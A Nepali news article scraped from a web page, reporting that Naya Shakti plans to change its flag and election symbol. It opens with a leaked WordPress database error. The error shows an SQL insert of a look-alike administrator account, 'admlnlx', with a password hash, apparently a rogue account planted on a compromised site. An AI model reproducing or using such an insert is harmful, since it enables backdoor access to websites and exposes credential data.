WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BnKIJYEXUVeNTSb6avs377M6Lq0R6F1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 17:28:49', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ ६-
डा बाबुराम भट्राई नेतृत्वको नयाँ शक्तिले पार्टी झण्डा र चुनाव चिन्ह फेर्ने भएको छ ।नयाँ शक्ति नेपालको आज बस्न लागेको राजनीतिक समितिको बैठकमा यसबारे छलफल हुने बताएको छ ।
यसअघि निर्वाचन आयोगमा दर्ता गराएको चुनाव चिन्ह र झण्डामा विवाद भएपछि उसले पार्टीको झण्डा र चुनव चिन्ह् फेर्ने निष्कर्षमा पुगेको हो ।यसअघि पार्टीको चुनाव चिन्ह तारा र झण्डामा रातो ब्याकग्राउण्डमा एउटा तारा राखिएको थियो । तर नेकपा माओवादी केन्द्र निकट वाइसिएलले नयाँ शक्तिले आफ्नो संगठनको झण्डा चोरेको आरोप लगाएको थियो भने निर्वाचन आयोगमा पनि तारा चुनाव चिन्ह अर्कै पार्टीको नाममा दर्ता रहेको पाइएपछि नयाँ शक्तिले पार्टीको झण्डा र चुनाव चिन्ह फेर्ने मनस्थितिमा पुगको हो ।
स्रोतका अनुसार अब चुनाव चिन्ह आँखा र पार्टीको नयाँ झण्डामा रातो ब्याकग्राउण्डमा ५ ओटा तारा राख्ने विषयमा छलफल हुने भइरहेको छ ।